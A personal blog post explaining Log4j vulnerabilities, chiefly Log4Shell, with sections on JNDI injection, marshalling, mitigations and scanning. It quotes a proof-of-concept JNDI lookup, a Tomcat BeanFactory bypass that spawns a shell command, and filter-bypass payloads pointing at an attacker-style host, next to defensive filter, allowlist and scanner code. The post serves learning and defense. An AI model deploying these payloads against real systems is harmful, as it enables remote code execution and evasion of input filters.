Log4j -- Catch Up

This was all over the news ~6 months ago and I was able to briefly glance at the vulnerability: something with how the logging interpreted something. It's time for me to actually look into these vulnerabilities.

What is Log4j?

Log4j is one of the most widely used Java logging frameworks. It logs messages to the console or to a file, depending on its configuration file.

Common Vulnerabilities and Exposures (CVE)

Let's get into some of the CVEs for Log4j, from oldest to newest.

CVE-2020-9488

CVE: CVE-2020-9488
Publish Date: 04/27/2020
Severity: 3.7
Severity level: Low
CVE Details
NVD - CVE-2020-9488

This vulnerability allows a Man in the Middle (MitM) attack, which leaks log messages through SMTP or SMTPS.

This vulnerability exists because the "SmtpAppender" didn't verify that the host name matched the SSL/TLS certificate. This is cool, but not as cool as an RCE, so let's keep going.


CVE-2021-44228

CVE: CVE-2021-44228
Publish Date: 12/10/2021
Severity: 10
Severity level: Critical
CVE Details
NVD - CVE-2021-44228

This is the big one! A CVSS score of 10 is the highest severity. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled".

LDAP?

All these acronyms can get confusing. LDAP stands for Lightweight Directory Access Protocol and serves as a means to maintain distributed directory information.

JNDI

Java Naming and Directory Interface (JNDI). This is a Java API that lets applications look up names and objects through a common interface. At the Service Provider Interface (SPI) layer, JNDI can make requests to RMI (Remote Method Invocation), LDAP, DNS, NIS, NDS, CORBA, etc. I'll get more in depth into this later, as this is the root cause of Log4Shell.

The main takeaway here is that anyone who can provide input to the logs can execute code.
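To make "input to the logs" concrete, here is a rough sketch of what lookup substitution sees when an application logs attacker-controlled text such as a User-Agent header. This is a simplified illustration and not Log4j's real substitution code: the class name, the method name, and the regular expression are all assumptions made for this post, and the regex only handles a single, non-nested expression.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Simplified illustration; this is NOT Log4j's real substitution code.
final class LookupSketch {

    // Matches a single, non-nested ${prefix:key} expression.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([^:}]+):([^}]*)\\}");

    // Returns "prefix -> key" for the first lookup in the message, or null if there is none.
    static String firstLookup(String message) {
        Matcher m = LOOKUP.matcher(message);
        return m.find() ? m.group(1) + " -> " + m.group(2) : null;
    }

    public static void main(String[] args) {
        // Attacker-controlled text, e.g. a User-Agent header that the application logs.
        String userAgent = "Mozilla/5.0 ${jndi:ldap://127.0.0.1:4321/Log4jRCE}";
        System.out.println(firstLookup("Request from " + userAgent));
    }
}
```

The point is that the application never has to call JNDI itself; the "jndi" prefix inside the logged string is what selects the lookup.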

A very quick example that appears in a lot of GitHub repos:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:4321/Log4jRCE}");
    }
}
Vulnerable Java log4j code (from https://github.com/xiajun325/apache-log4j-rce-poc/blob/master/src/main/java/log4j.java)

Compiling and running this Java program will cause it to reach out to an LDAP server on 127.0.0.1, port 4321. To get this to work, we'd need an LDAP server.

To handle this, we can use a popular repo (mbechler/marshalsec) which allows you to send custom marshaled Java payloads.

GitHub - mbechler/marshalsec
Java Unmarshaller Security - Turning your data into code execution
Infographic on loading code via JNDI

Here's an infographic of the network traffic during the Log4j exploit process. See the next section for more details, but the marshalsec repository sets up an LDAP server that redirects traffic to an HTTP server, which serves the Java .class files to be run via Log4j CVE-2021-44228.

Getting Back To The Root Cause: JNDI and Log4j

This vulnerability is at its core a "simple JNDI Injection flaw, but in a really really bad place" (https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/). Side note: this article does a stupendous job of explaining Log4Shell in the context of JNDI injections. There's also a paper (https://raw.githubusercontent.com/mbechler/marshalsec/master/marshalsec.pdf) that explains the unmarshaller and the unmarshalling process.

Essentially, JNDI injection research has been around for a while, but because the Log4j library is present in almost every Java application, it has been brought to the forefront.

A JNDI lookup() call can return a serialized Java object, and the code for it can be loaded remotely through an LDAP / RMI / CORBA / IIOP server. For RMI, remote codebase loading has been disabled by default since 2017. For LDAP, it has been disabled by default since 2018.

Michael Stepankin published an article in 2019 explaining that, even with remote codebases disabled, existing factories such as Apache Tomcat's BeanFactory can still be used to execute arbitrary code by evaluating the following snippet:

{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.blog.phsc138.com']).start()")}
Bypassing remote codebase fix from: https://www.veracode.com/blog/research/exploiting-jndi-injections-java

This brick of Java is passed to the factory as part of an object reference and is evaluated as code that does a name server lookup for jndi.blog.phsc138.com. A few more things need to be added to the RMI server to get it to work, specifically the reference to the BeanFactory and the forceString reference, but this is the meat and potatoes of it.

This is an example from the Tomcat BeanFactory. Other libraries can also be taken advantage of to gain remote code execution.

Marshalling and Unmarshalling

Marshalling "refers to any mechanism to convert from an internal representation to one that can be transferred or stored". That sounds very similar to serialization.

Serialization "is the process of converting an object into a stream of bytes to store the object or transmit it to memory, a database, or a file" (https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/concepts/serialization/).

Confused? I am too... Google time!

What is the difference between Serialization and Marshaling?

Serialization is a part of marshalling, but the codebase, or reference to the code needed to interpret the data, is attached during marshalling so that the object can be properly interpreted when it is unmarshalled.
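To see the difference in Java terms, here is a small sketch that serializes a value with the standard object streams and then wraps the same value in java.rmi.MarshalledObject, which stores the serialized bytes together with a codebase annotation when one is available. The class name MarshalDemo and its helper methods are made up for this post.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.rmi.MarshalledObject;

// Hypothetical demo class; only the java.io and java.rmi types are real APIs.
final class MarshalDemo {

    // Plain serialization: object -> bytes.
    static byte[] serialize(Object value) throws IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
            out.writeObject(value);
        }
        return buffer.toByteArray();
    }

    // Plain deserialization: bytes -> object.
    static Object deserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Object copy = deserialize(serialize("hello"));
        System.out.println(copy);

        // RMI-style marshalling: serialized bytes plus a codebase annotation if available.
        MarshalledObject<String> marshalled = new MarshalledObject<>("hello");
        System.out.println(marshalled.get());
    }
}
```

For a String there is no remote codebase to attach, so both paths behave the same here. The codebase annotation only matters when the receiving side doesn't already have the class.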

Section 4.1.2 of the marshalsec paper describes the path to RCE through the JNDI interface. A stored JNDI object can "indicate that it should be loaded from some other directory location". Calling the lookup() function with arbitrary input allows attackers to provide a URL to a malicious server. This malicious server will return a reference to an object factory with a malicious URL as the codebase.

Exploring Mitigations

A vulnerability blog post isn't complete without a mitigations section.

Input filtering and WAF rules

Filtering for this is extremely difficult, as there are a LOT of different techniques for getting characters into the ${} expression language syntax.

Some examples:

// https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}

// https://twitter.com/ymzkei5/status/1469765165348704256
j${::-nD}i${::-:}
Example jndi filter bypasses
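To see why a simple blocklist falls short, here is a minimal sketch of a naive filter. The class and method names (NaiveJndiFilter, looksMalicious) are hypothetical and are not part of Log4j or any real WAF. The filter just checks, case-insensitively, for the literal string ${jndi: in the input.

```java
import java.util.Locale;

// Hypothetical naive filter: NOT part of Log4j or any real WAF.
final class NaiveJndiFilter {

    // Flags input only when it contains the literal "${jndi:" (case-insensitive).
    static boolean looksMalicious(String input) {
        return input.toLowerCase(Locale.ROOT).contains("${jndi:");
    }

    public static void main(String[] args) {
        String plain = "${jndi:ldap://127.0.0.1:4321/Log4jRCE}";
        // Obfuscated form from the bypass examples: nested lookups rebuild "jndi:ldap".
        String nested = "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}";

        System.out.println(looksMalicious(plain));   // caught by the literal match
        System.out.println(looksMalicious(nested));  // slips past the literal match
    }
}
```

The nested payload never contains the literal text the filter is looking for, since the string only becomes "jndi:ldap" after Log4j resolves the inner lookups.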

Just Disable Log4j

Remove the JndiLookup class from the log4j-core JAR on the classpath:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Mitigation from https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

Might not be practical, but it works.

Disable JNDI

There are Java configuration options to disable JNDI lookups:

  1. Set the log4j2.formatMsgNoLookups Java system property to true
  2. Set the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true
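Option 1 is usually passed on the command line as -Dlog4j2.formatMsgNoLookups=true, but it can also be set from code. Here is a minimal sketch, assuming Log4j 2.10 or later (where this property is recognized) and assuming the call runs before any Log4j class is initialized. The class name DisableLookups is hypothetical.

```java
// Hypothetical startup hook; the class name is illustrative only.
final class DisableLookups {

    // Sets the property from option 1. This is assumed to run before Log4j
    // initializes, since the value is expected to be read during startup.
    static void apply() {
        System.setProperty("log4j2.formatMsgNoLookups", "true");
    }

    public static void main(String[] args) {
        apply();
        System.out.println(System.getProperty("log4j2.formatMsgNoLookups"));
    }
}
```

Setting it on the command line is the safer choice, because it doesn't depend on class loading order.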

Again, this is not practical if your applications require this interface, but given the severity of this vulnerability, it is an option.

Apply a Micro Patch

Some micro patches have been released. They are not part of an official release update, but they will help reduce the risk of exploitation.

Swiss Government Response

The Swiss government chimed in with mitigations as well. Mitigating the first network communication is difficult to do with input filtering alone, as stated above, but disabling remote codebases at the fifth network step would also be a good tactic for securing an environment.

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

Detecting if a System is Vulnerable

Log4j doesn't have to be installed manually for a system to be vulnerable. Log4j is included in a plethora of Java applications used in/by 1Password, 7-zip, Amazon AWS, Cisco, Dell, FedEx, Ghidra, GitHub, GitLab, and plenty more.

log4shell/software at main · NCSC-NL/log4shell
Status of vulnerable software

Scanning for Log4j

Many companies and individuals have rushed to create a detection method to identify vulnerable services. These have taken the form of Log4j vulnerability scanners.
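As a rough idea of what the simplest file-based scanners do, here is a sketch that opens a JAR and checks for the JndiLookup class at the same path used by the zip mitigation earlier. The class name JndiLookupScanner is hypothetical. Real scanners also handle nested and shaded JARs and check versions, none of which this does.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.zip.ZipFile;

// Hypothetical minimal scanner; it ignores nested jars, shaded copies, and versions.
final class JndiLookupScanner {

    static final String JNDI_LOOKUP_ENTRY =
            "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    // Returns true when the archive contains the JndiLookup class at its usual path.
    static boolean containsJndiLookup(Path jar) throws IOException {
        try (ZipFile zip = new ZipFile(jar.toFile())) {
            return zip.getEntry(JNDI_LOOKUP_ENTRY) != null;
        }
    }

    public static void main(String[] args) throws IOException {
        // Usage: java JndiLookupScanner path/to/first.jar path/to/second.jar
        for (String arg : args) {
            System.out.println(arg + ": " + containsJndiLookup(Paths.get(arg)));
        }
    }
}
```

A hit only means the class is present. Patched releases still ship it, so a result like this should be followed up with a version check.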


Closing

In closing, I finally feel like I understand the issue with this bug. The functionality to reference remote code is a great feature until it's exploited by an attacker. Two possible fixes I thought of during this research were a whitelist of LDAP servers and only enabling JNDI for parts of the code that don't accept user input. The whitelist wouldn't be effective against an attacker who has access to an allowed server, but it wouldn't hurt. Restricting JNDI to parts of the code would have to be implemented in the library, and would have to be per thread or per process so that there wouldn't be a race condition for potentially vulnerable parts of the application.
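The whitelist idea could look something like the sketch below. Everything in it is hypothetical: the class name, the method name, and the host ldap.internal.example are placeholders made up for this post, and none of it is a Log4j setting or API.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hypothetical allowlist check; the host name is a placeholder, not a Log4j setting.
final class LdapAllowlist {

    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("ldap.internal.example"));

    // Accepts only ldap:// or ldaps:// URLs whose host is on the allowlist.
    static boolean isAllowed(String url) {
        try {
            URI uri = new URI(url);
            String scheme = uri.getScheme();
            String host = uri.getHost();
            if (scheme == null || host == null) {
                return false;
            }
            boolean ldap = scheme.equalsIgnoreCase("ldap") || scheme.equalsIgnoreCase("ldaps");
            return ldap && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
        } catch (URISyntaxException e) {
            return false; // unparsable input is rejected rather than guessed at
        }
    }

    public static void main(String[] args) {
        System.out.println(isAllowed("ldap://ldap.internal.example:389/cn=app"));
        System.out.println(isAllowed("ldap://somesitehackerofhell.com/z"));
    }
}
```

A check like this is only as good as the agreement between the parser doing the check and the LDAP client making the connection. If the two disagree about what the host is, the allowlist can be sidestepped.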

CVE-2021-44228 has been fixed in the most recent releases, so the best recommendation is to patch.

Being able to go through this vulnerability is very cool for me since I was able to learn more about how Java works and see how a major vulnerability is handled by different companies and governments.

PHSC138
The World Wide Web